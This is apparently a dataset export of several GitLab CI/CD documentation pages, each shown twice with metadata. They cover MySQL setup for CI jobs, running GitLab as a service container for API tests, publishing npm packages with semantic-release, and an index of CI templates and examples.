apt-get install -y mysql-server mysql-client libmysqlclient-dev ``` 1. Choose a MySQL root password and type it twice when asked. {{< alert type="note" >}} As a security measure, you can run `mysql_secure_installation` to remove anonymous users, drop the test database, and disable remote logins by the root user. {{< /alert >}} 1. Create a user by logging in to MySQL as root: ```shell mysql -u root -p ``` 1. Create a user (in this case, `runner`) that is used by your application. Change `$password` in the command to a strong password. At the `mysql>` prompt, type: ```sql CREATE USER 'runner'@'localhost' IDENTIFIED BY '$password'; ``` 1. Create the database: ```sql CREATE DATABASE IF NOT EXISTS `<your_mysql_database>` DEFAULT CHARACTER SET `utf8` \ COLLATE `utf8_unicode_ci`; ``` 1. Grant the necessary permissions on the database: ```sql GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, CREATE TEMPORARY TABLES, DROP, INDEX, ALTER, LOCK TABLES ON `<your_mysql_database>`.* TO 'runner'@'localhost'; ``` 1. If all went well, you can quit the database session: ```shell \q ``` 1. Connect to the newly-created database to check that everything is in place: ```shell mysql -u runner -p -D <your_mysql_database> ``` 1. Configure your application to use the database, for example: ```shell Host: localhost User: runner Password: $password Database: <your_mysql_database> ``` ## Example project To view a MySQL example, create a fork of this [sample project](https://gitlab.com/gitlab-examples/mysql). This project uses publicly-available [instance runners](../runners/_index.md) on [GitLab.com](https://gitlab.com). Update the README.md file, commit your changes, and view the CI/CD pipeline to see it in action.
https://docs.gitlab.com/ci/gitlab
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/gitlab.md
2025-08-13
doc/ci/services
[ "doc", "ci", "services" ]
gitlab.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use GitLab as a microservice
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Many applications need to access JSON APIs, so application tests might need access to APIs too. The following example shows how to use GitLab as a microservice to give tests access to the GitLab API. 1. Configure a [runner](../runners/_index.md) with the Docker or Kubernetes executor. 1. In your `.gitlab-ci.yml` add: ```yaml services: - name: gitlab/gitlab-ce:latest alias: gitlab variables: GITLAB_HTTPS: "false" # ensure that plain http works GITLAB_ROOT_PASSWORD: "password" # to access the api with user root:password ``` {{< alert type="note" >}} Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md). {{< /alert >}} Then, commands in `script` sections in your `.gitlab-ci.yml` file can access the API at `http://gitlab/api/v4`. For more information about why `gitlab` is used for the `Host`, see [How services are linked to the job](../docker/using_docker_images.md#extended-docker-configuration-options). You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/u/gitlab). The `gitlab` image can accept environment variables. For more details, see the [Linux package documentation](../../install/_index.md).
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use GitLab as a microservice breadcrumbs: - doc - ci - services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Many applications need to access JSON APIs, so application tests might need access to APIs too. The following example shows how to use GitLab as a microservice to give tests access to the GitLab API. 1. Configure a [runner](../runners/_index.md) with the Docker or Kubernetes executor. 1. In your `.gitlab-ci.yml` add: ```yaml services: - name: gitlab/gitlab-ce:latest alias: gitlab variables: GITLAB_HTTPS: "false" # ensure that plain http works GITLAB_ROOT_PASSWORD: "password" # to access the api with user root:password ``` {{< alert type="note" >}} Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md). {{< /alert >}} Then, commands in `script` sections in your `.gitlab-ci.yml` file can access the API at `http://gitlab/api/v4`. For more information about why `gitlab` is used for the `Host`, see [How services are linked to the job](../docker/using_docker_images.md#extended-docker-configuration-options). You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/u/gitlab). The `gitlab` image can accept environment variables. For more details, see the [Linux package documentation](../../install/_index.md).
https://docs.gitlab.com/ci/semantic-release
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/semantic-release.md
2025-08-13
doc/ci/examples
[ "doc", "ci", "examples" ]
semantic-release.md
Package
Package Registry
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Publish npm packages to the GitLab package registry using semantic-release
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide demonstrates how to automatically publish npm packages to the [GitLab package registry](../../user/packages/npm_registry/_index.md) by using [semantic-release](https://github.com/semantic-release/semantic-release). You can also view or fork the complete [example source](https://gitlab.com/gitlab-examples/semantic-release-npm). ## Initialize the module 1. Open a terminal and go to the project's repository. 1. Run `npm init`. Name the module according to [the package registry's naming conventions](../../user/packages/npm_registry/_index.md#naming-convention). For example, if the project's path is `gitlab-examples/semantic-release-npm`, name the module `@gitlab-examples/semantic-release-npm`. 1. Install the following npm packages: ```shell npm install semantic-release @semantic-release/git @semantic-release/gitlab @semantic-release/npm --save-dev ``` 1. Add the following properties to the module's `package.json`: ```json { "scripts": { "semantic-release": "semantic-release" }, "publishConfig": { "access": "public" }, "files": [ <path(s) to files here> ] } ``` 1. Update the `files` key with glob patterns that selects all files that should be included in the published module. More information about `files` can be found [in the npm documentation](https://docs.npmjs.com/cli/v6/configuring-npm/package-json/#files). 1. Add a `.gitignore` file to the project to avoid committing `node_modules`: ```plaintext node_modules ``` ## Configure the pipeline Create a `.gitlab-ci.yml` with the following content: ```yaml default: image: node:latest before_script: - npm ci --cache .npm --prefer-offline - | { echo "@${CI_PROJECT_ROOT_NAMESPACE}:registry=${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/npm/" echo "${CI_API_V4_URL#https?}/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=\${CI_JOB_TOKEN}" } | tee -a .npmrc cache: key: ${CI_COMMIT_REF_SLUG} paths: - .npm/ workflow: rules: - if: $CI_COMMIT_BRANCH variables: NPM_TOKEN: ${CI_JOB_TOKEN} stages: - release publish: stage: release script: - npm run semantic-release rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH ``` This example configures the pipeline with a single job, `publish`, which runs `semantic-release`. The semantic-release library publishes new versions of the npm package and creates new GitLab releases (if necessary). The default `before_script` generates a temporary `.npmrc` that is used to authenticate to the package registry during the `publish` job. ## Set up CI/CD variables As part of publishing a package, semantic-release increases the version number in `package.json`. For semantic-release to commit this change and push it back to GitLab, the pipeline requires a custom CI/CD variable named `GITLAB_TOKEN`. To create this variable: <!-- markdownlint-disable MD044 --> 1. Open the left sidebar. 1. Select **Settings > Access tokens**. 1. In your project, select **Add new token**. 1. In the **Token name** box, enter a token name. 1. Under **Select scopes**, select the **api** checkbox. 1. Select **Create project access token**. 1. Copy the token value. 1. On the left sidebar, select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable**. 1. Under **Visibility**, select **Masked**. 1. In the **Key** box, enter `GITLAB_TOKEN`. 1. In the **Value** box, enter the token value. 1. Select **Add variable**. <!-- markdownlint-enable MD044 --> ## Configure semantic-release semantic-release pulls its configuration information from a `.releaserc.json` file in the project. Create a `.releaserc.json` at the root of the repository: ```json { "branches": ["main"], "plugins": [ "@semantic-release/commit-analyzer", "@semantic-release/release-notes-generator", "@semantic-release/gitlab", "@semantic-release/npm", [ "@semantic-release/git", { "assets": ["package.json"], "message": "chore(release): ${nextRelease.version} [skip ci]\n\n${nextRelease.notes}" } ] ] } ``` In the previous semantic-release configuration example, you can change the branch name to your project's default branch. ## Begin publishing releases Test the pipeline by creating a commit with a message like: ```plaintext fix: testing patch releases ``` Push the commit to the default branch. The pipeline should create a new release (`v1.0.0`) on the project's **Releases** page and publish a new version of the package to the project's **Package registry** page. To create a minor release, use a commit message like: ```plaintext feat: testing minor releases ``` Or, for a breaking change: ```plaintext feat: testing major releases BREAKING CHANGE: This is a breaking change. ``` More information about how commit messages are mapped to releases can be found in [semantic-releases's documentation](https://github.com/semantic-release/semantic-release#how-does-it-work). ## Use the module in a project To use the published module, add an `.npmrc` file to the project that depends on the module. For example, to use [the example project](https://gitlab.com/gitlab-examples/semantic-release-npm)'s module: ```plaintext @gitlab-examples:registry=https://gitlab.com/api/v4/packages/npm/ ``` Then, install the module: ```shell npm install --save @gitlab-examples/semantic-release-npm ``` ## Troubleshooting ### Deleted Git tags reappear A [Git tag](../../user/project/repository/tags/_index.md) deleted from the repository can sometimes be recreated by `semantic-release` when GitLab runners use a cached version of the repository. If the job runs on a runner with a cached repository that still has the tag, `semantic-release` recreates the tag in the main repository. To avoid this behavior, you can either: - Configure the runner with [`GIT_STRATEGY: clone`](../runners/configure_runners.md#git-strategy). - Include the [`git fetch --prune-tags` command](https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---prune-tags) in your CI/CD script.
--- stage: Package group: Package Registry info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Publish npm packages to the GitLab package registry using semantic-release breadcrumbs: - doc - ci - examples --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide demonstrates how to automatically publish npm packages to the [GitLab package registry](../../user/packages/npm_registry/_index.md) by using [semantic-release](https://github.com/semantic-release/semantic-release). You can also view or fork the complete [example source](https://gitlab.com/gitlab-examples/semantic-release-npm). ## Initialize the module 1. Open a terminal and go to the project's repository. 1. Run `npm init`. Name the module according to [the package registry's naming conventions](../../user/packages/npm_registry/_index.md#naming-convention). For example, if the project's path is `gitlab-examples/semantic-release-npm`, name the module `@gitlab-examples/semantic-release-npm`. 1. Install the following npm packages: ```shell npm install semantic-release @semantic-release/git @semantic-release/gitlab @semantic-release/npm --save-dev ``` 1. Add the following properties to the module's `package.json`: ```json { "scripts": { "semantic-release": "semantic-release" }, "publishConfig": { "access": "public" }, "files": [ <path(s) to files here> ] } ``` 1. Update the `files` key with glob patterns that selects all files that should be included in the published module. More information about `files` can be found [in the npm documentation](https://docs.npmjs.com/cli/v6/configuring-npm/package-json/#files). 1. Add a `.gitignore` file to the project to avoid committing `node_modules`: ```plaintext node_modules ``` ## Configure the pipeline Create a `.gitlab-ci.yml` with the following content: ```yaml default: image: node:latest before_script: - npm ci --cache .npm --prefer-offline - | { echo "@${CI_PROJECT_ROOT_NAMESPACE}:registry=${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/npm/" echo "${CI_API_V4_URL#https?}/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=\${CI_JOB_TOKEN}" } | tee -a .npmrc cache: key: ${CI_COMMIT_REF_SLUG} paths: - .npm/ workflow: rules: - if: $CI_COMMIT_BRANCH variables: NPM_TOKEN: ${CI_JOB_TOKEN} stages: - release publish: stage: release script: - npm run semantic-release rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH ``` This example configures the pipeline with a single job, `publish`, which runs `semantic-release`. The semantic-release library publishes new versions of the npm package and creates new GitLab releases (if necessary). The default `before_script` generates a temporary `.npmrc` that is used to authenticate to the package registry during the `publish` job. ## Set up CI/CD variables As part of publishing a package, semantic-release increases the version number in `package.json`. For semantic-release to commit this change and push it back to GitLab, the pipeline requires a custom CI/CD variable named `GITLAB_TOKEN`. To create this variable: <!-- markdownlint-disable MD044 --> 1. Open the left sidebar. 1. Select **Settings > Access tokens**. 1. In your project, select **Add new token**. 1. In the **Token name** box, enter a token name. 1. Under **Select scopes**, select the **api** checkbox. 1. Select **Create project access token**. 1. Copy the token value. 1. On the left sidebar, select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable**. 1. Under **Visibility**, select **Masked**. 1. In the **Key** box, enter `GITLAB_TOKEN`. 1. In the **Value** box, enter the token value. 1. Select **Add variable**. <!-- markdownlint-enable MD044 --> ## Configure semantic-release semantic-release pulls its configuration information from a `.releaserc.json` file in the project. Create a `.releaserc.json` at the root of the repository: ```json { "branches": ["main"], "plugins": [ "@semantic-release/commit-analyzer", "@semantic-release/release-notes-generator", "@semantic-release/gitlab", "@semantic-release/npm", [ "@semantic-release/git", { "assets": ["package.json"], "message": "chore(release): ${nextRelease.version} [skip ci]\n\n${nextRelease.notes}" } ] ] } ``` In the previous semantic-release configuration example, you can change the branch name to your project's default branch. ## Begin publishing releases Test the pipeline by creating a commit with a message like: ```plaintext fix: testing patch releases ``` Push the commit to the default branch. The pipeline should create a new release (`v1.0.0`) on the project's **Releases** page and publish a new version of the package to the project's **Package registry** page. To create a minor release, use a commit message like: ```plaintext feat: testing minor releases ``` Or, for a breaking change: ```plaintext feat: testing major releases BREAKING CHANGE: This is a breaking change. ``` More information about how commit messages are mapped to releases can be found in [semantic-releases's documentation](https://github.com/semantic-release/semantic-release#how-does-it-work). ## Use the module in a project To use the published module, add an `.npmrc` file to the project that depends on the module. For example, to use [the example project](https://gitlab.com/gitlab-examples/semantic-release-npm)'s module: ```plaintext @gitlab-examples:registry=https://gitlab.com/api/v4/packages/npm/ ``` Then, install the module: ```shell npm install --save @gitlab-examples/semantic-release-npm ``` ## Troubleshooting ### Deleted Git tags reappear A [Git tag](../../user/project/repository/tags/_index.md) deleted from the repository can sometimes be recreated by `semantic-release` when GitLab runners use a cached version of the repository. If the job runs on a runner with a cached repository that still has the tag, `semantic-release` recreates the tag in the main repository. To avoid this behavior, you can either: - Configure the runner with [`GIT_STRATEGY: clone`](../runners/configure_runners.md#git-strategy). - Include the [`git fetch --prune-tags` command](https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---prune-tags) in your CI/CD script.
https://docs.gitlab.com/ci/examples
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/examples
[ "doc", "ci", "examples" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab CI/CD examples
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This page contains links to a variety of examples that can help you understand how to implement [GitLab CI/CD](../_index.md) for your specific use case. Examples are available in several forms. As a collection of: - `.gitlab-ci.yml` [template files](#cicd-templates) maintained in GitLab, for many common frameworks and programming languages. - Repositories with [example projects](https://gitlab.com/gitlab-examples) for various languages. You can fork and adjust them to your own needs. Projects include an example of using [review apps with a static site served by NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx/). - Examples and [other resources](#other-resources) listed in the following sections. ## CI/CD examples The following table lists examples with step-by-step tutorials that are contained in this section: | Use case | Resource | |-------------------------------|----------| | Deployment with Dpl | [Using `dpl` as deployment tool](deployment/_index.md). | | GitLab Pages | See the [GitLab Pages](../../user/project/pages/_index.md) documentation for a complete example of deploying a static site. | | Multi project pipeline | [Build, test deploy using multi project pipeline](https://gitlab.com/gitlab-examples/upstream-project). | | npm with semantic-release | [Publish npm packages to the GitLab package registry using semantic-release](semantic-release.md). | | PHP with npm, SCP | [Running Composer and npm scripts with deployment via SCP in GitLab CI/CD](deployment/composer-npm-deploy.md). | | PHP with PHPUnit, `atoum` | [Testing PHP projects](php.md). | | Secrets management with Vault | [Authenticating and Reading Secrets With HashiCorp Vault](../secrets/hashicorp_vault.md). | ### Contributed examples You can help people that use your favorite programming language by submitting a link to a guide for that language. These contributed guides are hosted externally or in separate example projects: | Use case | Resource | |-------------------------------|----------| | Clojure | [Test a Clojure application with GitLab CI/CD](https://gitlab.com/gitlab-examples/clojure-web-application). | | Game development | [DevOps and Game Development with GitLab CI/CD](https://gitlab.com/gitlab-examples/gitlab-game-demo/). | | Java with Maven | [How to deploy Maven projects to Artifactory with GitLab CI/CD](https://gitlab.com/gitlab-examples/maven/simple-maven-example). | | Java with Spring Boot | [Deploy a Spring Boot application to Cloud Foundry with GitLab CI/CD](https://gitlab.com/gitlab-examples/spring-gitlab-cf-deploy-demo). | | Parallel testing Ruby & JS | [GitLab CI/CD parallel jobs testing for Ruby & JavaScript projects](https://docs.knapsackpro.com/2019/how-to-run-parallel-jobs-for-rspec-tests-on-gitlab-ci-pipeline-and-speed-up-ruby-javascript-testing). | | Python on Heroku | [Test and deploy a Python application with GitLab CI/CD](https://gitlab.com/gitlab-examples/python-getting-started). | | Ruby on Heroku | [Test and deploy a Ruby application with GitLab CI/CD](https://gitlab.com/gitlab-examples/ruby-getting-started). | | Scala on Heroku | [Test and deploy a Scala application to Heroku](https://gitlab.com/gitlab-examples/scala-sbt). | ## CI/CD templates Get started with GitLab CI/CD and your favorite programming language or framework by using a `.gitlab-ci.yml` [template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). When you create a `.gitlab-ci.yml` file in the UI, you can choose one of these templates: - [Android (`Android.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android.gitlab-ci.yml) - [Android with fastlane (`Android-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android-Fastlane.gitlab-ci.yml) - [Bash (`Bash.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Bash.gitlab-ci.yml) - [C++ (`C++.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/C++.gitlab-ci.yml) - [Chef (`Chef.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Chef.gitlab-ci.yml) - [Clojure (`Clojure.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Clojure.gitlab-ci.yml) - [Composer `Composer.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Composer.gitlab-ci.yml) - [Crystal (`Crystal.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Crystal.gitlab-ci.yml) - [Dart (`Dart.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Dart.gitlab-ci.yml) - [Django (`Django.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Django.gitlab-ci.yml) - [Docker (`Docker.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml) - [dotNET (`dotNET.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET.gitlab-ci.yml) - [dotNET Core (`dotNET-Core.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET-Core.gitlab-ci.yml) - [Elixir (`Elixir.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Elixir.gitlab-ci.yml) - [Flutter (`Flutter.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Flutter.gitlab-ci.yml) - [Go (`Go.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Go.gitlab-ci.yml) - [Gradle (`Gradle.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Gradle.gitlab-ci.yml) - [Grails (`Grails.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Grails.gitlab-ci.yml) - [iOS with fastlane (`iOS-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/iOS-Fastlane.gitlab-ci.yml) - [Julia (`Julia.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Julia.gitlab-ci.yml) - [Laravel (`Laravel.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Laravel.gitlab-ci.yml) - [LaTeX (`LaTeX.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/LaTeX.gitlab-ci.yml) - [Maven (`Maven.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml) - [Mono (`Mono.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Mono.gitlab-ci.yml) - [npm (`npm.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/npm.gitlab-ci.yml) - [Node.js (`Nodejs.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Nodejs.gitlab-ci.yml) - [OpenShift (`OpenShift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/OpenShift.gitlab-ci.yml) - [Packer (`Packer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Packer.gitlab-ci.yml) - [PHP (`PHP.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/PHP.gitlab-ci.yml) - [Python (`Python.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Python.gitlab-ci.yml) - [Ruby (`Ruby.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Ruby.gitlab-ci.yml) - [Rust (`Rust.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Rust.gitlab-ci.yml) - [Scala (`Scala.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Scala.gitlab-ci.yml) - [Swift (`Swift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Swift.gitlab-ci.yml) - [Terraform (`Terraform.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.gitlab-ci.yml) - [Terraform (`Terraform.latest.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.latest.gitlab-ci.yml) If a programming language or framework template is not in this list, you can contribute one. To create a template, submit a merge request to [the templates list](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). ### Adding templates to your GitLab installation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can add custom examples and templates to your instance. Your GitLab administrator can [designate an instance template repository](../../administration/settings/instance_template_repository.md) that contains examples and templates specific to your organization. ## Other resources This section provides further resources to help you get familiar with various uses of GitLab CI/CD. Older articles and videos may not reflect the state of the latest GitLab release. ### CI/CD in the cloud For examples of setting up GitLab CI/CD for cloud-based environments, see: - [How to set up multi-account AWS SAM deployments with GitLab CI](https://about.gitlab.com/blog/2019/02/04/multi-account-aws-sam-deployments-with-gitlab-ci/) - Video: [Automating Kubernetes Deployments with GitLab CI/CD](https://www.youtube.com/watch?v=wEDRfAz6_Uw) - [How to autoscale continuous deployment with GitLab Runner on DigitalOcean](https://about.gitlab.com/blog/2018/06/19/autoscale-continuous-deployment-gitlab-runner-digital-ocean/) - [How to create a CI/CD pipeline with Auto Deploy to Kubernetes using GitLab and Helm](https://about.gitlab.com/blog/2017/09/21/how-to-create-a-ci-cd-pipeline-with-auto-deploy-to-kubernetes-using-gitlab/) - Video: [Demo - Deploying from GitLab to OpenShift Container Cluster](https://youtu.be/EwbhA53Jpp4) - Tutorial: [Set up a GitLab.com Civo Kubernetes integration with Gitpod](https://gitlab.com/k33g_org/k33g_org.gitlab.io/-/issues/82) See also the following video overviews: - Video: [Kubernetes, GitLab, and Cloud Native](https://www.youtube.com/watch?v=d-9awBxEbvQ) - Video: [Deploying to IBM Cloud with GitLab CI/CD](https://www.youtube.com/watch?v=6ZF4vgKMd-g) ### Customer stories For some customer experiences with GitLab CI/CD, see: - [How Verizon Connect reduced data center deploys from 30 days to under 8 hours with GitLab](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/) - [How Wag! cut their release process from 40 minutes to just 6](https://about.gitlab.com/blog/2019/01/16/wag-labs-blog-post/) - [How Jaguar Land Rover embraced CI to speed up their software lifecycle](https://about.gitlab.com/blog/2018/07/23/chris-hill-devops-enterprise-summit-talk/) ### Getting started For some examples to help get you started, see: - [GitLab CI/CD's 2018 highlights](https://about.gitlab.com/blog/2019/01/21/gitlab-ci-cd-features-improvements/) - [A beginner's guide to continuous integration](https://about.gitlab.com/blog/2018/01/22/a-beginners-guide-to-continuous-integration/) ### Implementing GitLab CI/CD For examples of others who have implemented GitLab CI/CD, see: - [How to streamline interactions between multiple repositories with multi-project pipelines](https://about.gitlab.com/blog/2018/10/31/use-multiproject-pipelines-with-gitlab-cicd/) - [How we used GitLab CI to build GitLab faster](https://about.gitlab.com/blog/2018/05/02/using-gitlab-ci-to-build-gitlab-faster/) - [Test all the things in GitLab CI with Docker by example](https://about.gitlab.com/blog/2018/02/05/test-all-the-things-gitlab-ci-docker-examples/) - [A Craftsman looks at continuous integration](https://about.gitlab.com/blog/2018/01/17/craftsman-looks-at-continuous-integration/) - [Go tools and GitLab: How to do continuous integration like a boss](https://about.gitlab.com/blog/2017/11/27/go-tools-and-gitlab-how-to-do-continuous-integration-like-a-boss/) - [GitBot - automating boring Git operations with CI](https://about.gitlab.com/blog/2017/11/02/automating-boring-git-operations-gitlab-ci/) - [How to use GitLab CI for Vue.js](https://about.gitlab.com/blog/2017/09/12/vuejs-app-gitlab/) - Video: [GitLab CI/CD Deep Dive](https://youtu.be/pBe4t1CD8Fc?t=195) - [Dockerizing GitLab review apps](https://about.gitlab.com/blog/2017/07/11/dockerizing-review-apps/) - [Fast and natural continuous integration with GitLab CI](https://about.gitlab.com/blog/2017/05/22/fast-and-natural-continuous-integration-with-gitlab-ci/) - [Demo: CI/CD with GitLab in action](https://about.gitlab.com/blog/2017/03/13/ci-cd-demo/) ### Migrating to GitLab from third-party CI tools Examples of migration to GitLab CI/CD from other tools: - [Bamboo](../migration/bamboo.md) - [CircleCI](../migration/circleci.md) - [GitHub Actions](../migration/github_actions.md) - [Jenkins](../migration/jenkins.md) - [TeamCity](../migration/teamcity.md) ### Integrating GitLab CI/CD with other systems To see how you can integrate GitLab CI/CD with third-party systems, see: - [Streamline and shorten error remediation with Sentry's new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) - [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/) - [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/) - [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/) ### Mobile development For help with using GitLab CI/CD for mobile application development, see: - [How to publish Android apps to the Google Play Store with GitLab and fastlane](https://about.gitlab.com/blog/2019/01/28/android-publishing-with-gitlab-and-fastlane/) - [Setting up GitLab CI for Android projects](https://about.gitlab.com/blog/2018/10/24/setting-up-gitlab-ci-for-android-projects/) - [Working with YAML in GitLab CI from the Android perspective](https://about.gitlab.com/blog/2017/11/20/working-with-yaml-gitlab-ci-android/) - [How to use GitLab CI and MacStadium to build your macOS or iOS projects](https://about.gitlab.com/blog/2017/05/15/how-to-use-macstadium-and-gitlab-ci-to-build-your-macos-or-ios-projects/) - [Setting up GitLab CI for iOS projects](https://about.gitlab.com/blog/2016/03/10/setting-up-gitlab-ci-for-ios-projects/)
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab CI/CD examples breadcrumbs: - doc - ci - examples --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This page contains links to a variety of examples that can help you understand how to implement [GitLab CI/CD](../_index.md) for your specific use case. Examples are available in several forms. As a collection of: - `.gitlab-ci.yml` [template files](#cicd-templates) maintained in GitLab, for many common frameworks and programming languages. - Repositories with [example projects](https://gitlab.com/gitlab-examples) for various languages. You can fork and adjust them to your own needs. Projects include an example of using [review apps with a static site served by NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx/). - Examples and [other resources](#other-resources) listed in the following sections. ## CI/CD examples The following table lists examples with step-by-step tutorials that are contained in this section: | Use case | Resource | |-------------------------------|----------| | Deployment with Dpl | [Using `dpl` as deployment tool](deployment/_index.md). | | GitLab Pages | See the [GitLab Pages](../../user/project/pages/_index.md) documentation for a complete example of deploying a static site. | | Multi project pipeline | [Build, test deploy using multi project pipeline](https://gitlab.com/gitlab-examples/upstream-project). | | npm with semantic-release | [Publish npm packages to the GitLab package registry using semantic-release](semantic-release.md). | | PHP with npm, SCP | [Running Composer and npm scripts with deployment via SCP in GitLab CI/CD](deployment/composer-npm-deploy.md). | | PHP with PHPUnit, `atoum` | [Testing PHP projects](php.md). | | Secrets management with 